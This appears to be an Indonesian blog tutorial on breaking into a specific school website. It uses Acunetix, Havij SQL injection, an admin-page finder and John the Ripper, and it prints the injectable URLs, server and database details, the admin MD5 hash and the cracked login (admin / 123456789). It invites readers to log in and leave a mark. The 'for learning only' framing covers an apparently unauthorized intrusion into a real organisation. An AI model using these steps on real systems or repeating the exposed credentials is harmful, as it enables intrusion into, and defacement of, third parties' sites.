Hacking merupakan sebuah seni yang bisa di bilang mempunyai kedua kekuatan antara white hacking dan black hacking, antara seni berbuat baik dan seni berbuat jahat. Pada dasarnya hacking itu bertujuan untuk menemukan sesuatu kelemahan pada sebuah system atau aplikasi agar kita dapat membongkar source code di dalam system tersebut dan
berhasil masuk ke dalam system tersebut. Pada dasarnya kita dapat merubahnya namun kita tidak untuk merusak. Kali ini kita akan mencoba membongkar sebuah keamanan website dengan menggunakan teknik vuln system kelemahan dengan SQL injection
Software yang di pakai :1 Acunetix
2 John The Ripper
3 Havij 1.15 Pro
4 Admin Finder versi Network Security
5 Active Perl
Untuk target yang kita lakukan testing keamanan adalah website salah satu sekolahan di Indonesia dengan domain menggunakan .sch.id Target sekolah ini di ambil untuk pembelajaran karena lemahnya system keamanan pada website tersebut. Di publikasikan untuk pembel ajaran bukan untuk merusak sebuah system.
Target : http://smpn18bkl.sch.id
Untuk scanning gunakan alat : Acunetix
Untuk pengambilan dumping password admin gunakan : Havij
Untuk memecah descyript md5 password admin menggunakan : John The Ripper
Untuk menemukan halaman login menggunakan : Adminfinder versi Network Security
Ok langsung saja . . .
Penggunaan Acunetix
- Masuk ke acunetix lalu masukan nama website :
- Masukan nama websitenya pada kolom website url,
- lalu selanjutnya pilih tombol next. Biarkan sajah defaultnya seperti itu, lalu klik tombol next.
- Selanjutnya adalah informasi target korban seperti server, operating system, web server, pemograman technologies yang di gunakan oleh korban akan terekam di sini
- Lalu klik tombol next. Tampilan selanjutnya adalah informasi login biarkan sajah default seperti bawaan
- Lalu pilih tombol next. Jika sudah akan muncul tampilan finish dan siap melalukan scanning di acunetix dan biarkan acunetix men-scan website korban hingga selesai.
- Untuk additional host dectected biarkan sajah, bila ada subdomain dari web utama misalnya http://a.smpn18bkl.sch.id bisa anda centang, berhubung dari website korban tidak mempunyai sub domain anda biarkan sajah.
- Selanjutnya pilih tombol finish.
- Selanjutnya dari data korban kita menangkap adanya sebuah vuln blind sql yang dapat kita serang kita menemukan http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
- Kita dapatkan dari hasil scanner menggunakan acunetix
- Pada awalnya yang mempunyai blind sql injection adalah pada website http://smpn18bkl.sch.id/berita.php?id=-1
#Catatan : Bagi anda yang menemukan web lain yang bertuliskan "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near" berate website tersebut bisa di dump dengan havij. Dari hasil scanning di atas dapat di simpulkan bahwa website tersebut memunyai banyak celah untuk di trobos systemnya termasuk dengan sql injection dan juga xss.
Penggunaan Havij
- Masuk ke havij gunakan alamat yang kita serang tadi bisa menggunakan http://smpn18bkl.sch.id/berita.php?id=-1 atau yang telah saya trobos lebih dalam lagi http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
- hilangkan tanda – untuk yang pertama dan ‘ untuk yang kedua untuk sql injection menggunakan havij
- Lalu setelah memasukan web url klik analyze tunggu sampai selesai.
- Setelah selesai anda buka menu info dan klik get dan tunggu hingga selesai, jika selesai maka informasi yang kita dapatkan adalah
Target: http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
Host IP: 49.156.21.35
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 128 ms
Current User: smpn18bk_userdb@localhost
Sql Version: 5.0.96-community
Current DB: smpn18bk_dbase
System User: smpn18bk_userdb@localhost
Host Name: pasai.magnethost.asia
Installation dir: /
DB User: 'smpn18bk_userdb'@'localhost'
Data Bases: information_schema
smpn18bk_dbase
Data Bases: information_schema
smpn18bk_dbase
- Selanjutnya adalah klik tables untuk mendapatkan informasi dari database smpn18bk_dbase
- Pertama-tama adalah klik get dbs untuk mendapatkan nama database, selanjutnya adalah Untuk mencari tables anda centang table smpn18bk_base klik get tables
- setelah itu maka akan muncul tables lebih detail seperti berikut ini :
Hasil keseluruhan isi database :siswa
profil
pengumuman
pegawai_str
nilai
mapel
kelas
kategori_galeri
kategori_berita
kaldik
guru_staf
galeri
bukutamu
berita
agenda
admin
- Setelah itu kita centang tables admin lalu klik get coloums untuk mendapatkan username, password, id dan setelah itu akan muncul password dalam bentuk md5, username, id centang semua dan klik get data.
Dan dapat hasil sebagai berikut :
Username : admin
Password dalam bentuk md5 : 25f9e794323b453885f5181f1b624d0b
Penggunaan Admin FinderSelanjutnya adalah bagimana kita bisa menemukan halaman login website tersebut, kita bisa menggunakan admin finder atau pun dari acunetix di atas sudah bisa melihat halaman login. Namun untuk lebih mengetahui admin finder ini anda bisa mencobanya.
- Sebagai tutorial saya menaruh admin finder di directori C:\Pentest\tools\admin Adminfinder.pl
- Lalu buka cmd dengan perintah berikut dan pastikan perl anda sudah terinstall dengan baik.
- Setalah adminfinder.pl tekan enter dan akan muncul perintah , itu merupakan adminfinder.pl yang siap anda gunakan untuk mencari halaman login.
(*) nb : untuk tempat file adminfinder anda bisa merubahnya sesuai dengan keingin
- anda pastikan berada dalam disk C
- Setelah itu masukan nama website target www.smpn18bkl.sch.id dan tekan enter
- setelah itu ketik php dan tekan enter.
- Selanjutnya tools ini akan mencari halaman admin secara otomatis.
- Carilah yang found berate itulah halaman login website dari target.
- Saya membuka dengan alamat http://smpn18bkl.sch.id/admin/login.php maka akan terbuka menu login dari website tersebut.
- Selanjutnya adalah crack password md5 dengan john the ripper.
Penggunaan John The Ripper
Selanjutnya dalah penggunaan john the ripper di mana kita sudah dapatkan password dari md5 dari vuln sql injection yang berhasil di baca dengan software havij yakni 25f9e794323b453885f5181f1b624d0b sebelum kita memulai aksi penggunaan john the ripper
- pastikan kita membuat sebuah fle .txt pada folder john semua akan di bahas
- Pertama-tama masuk ke folder john dan masuk ke directori run lalu buat file bernama hash.txt (*) bn bisa di ubah dengan nama file lainnya.
- Selanjutnya isi file tersebut dengan md5 hash yang kita dapatkan dari havij sebelumnya tambahkan 1: pada awal. Jika banyak password pada saat dumping kita bisa menggunakan 2: 3: dan seterusnya contoh:
1: 25f9e794323b453885f5181f1b624d0b
2: 25f9e794323b453885f5181f1b624d0a
3: 25f9e794323b453885f5181f1b624d0c
- Lalu kita save.
- Selanjutnya buka command promt (cmd)
- Cd C:\Pentest\passwords\john\run itu adalah folder directori yang saya taruh untuk menempatkan john. Yakni di folder C:\Pentest\passwords
- Selanjutnya dalah jalankan john dengan perintah John –format=raw-md5 hash.txt Yang bertanda merah adalah password login asli sebelum di md5 yakni 123456789
- Berate dapat kita simpulkan login dari website target adalah :
Username : admin
Password : 123456789 Hacking SystemSelanjutnya adalah hacking system kita dapat melihat isi dalaman dari website korban, ingat jangan untuk di ubah sekali lagi kita hanya untuk memperingati kelemahan pada website korban bukan untuk merusak !!!
- login dengan username dan password tadi yang sudah kita crack dengan john the ripper.
- Maka akan terlihat dengan jelas halaman login dari isi website tersebut.
- Jika anda setelah login Terpampang dengan jelas halaman menu admin dari website. Anda bisa memperigati admin tersebut dengan meninggalkan jejak dan ingat sekali lagi tutorial ini bukan untuk merusak system ☺
#kami tidak bertanggung jawab atas apa yang anda lakukan ,terima kasih :)
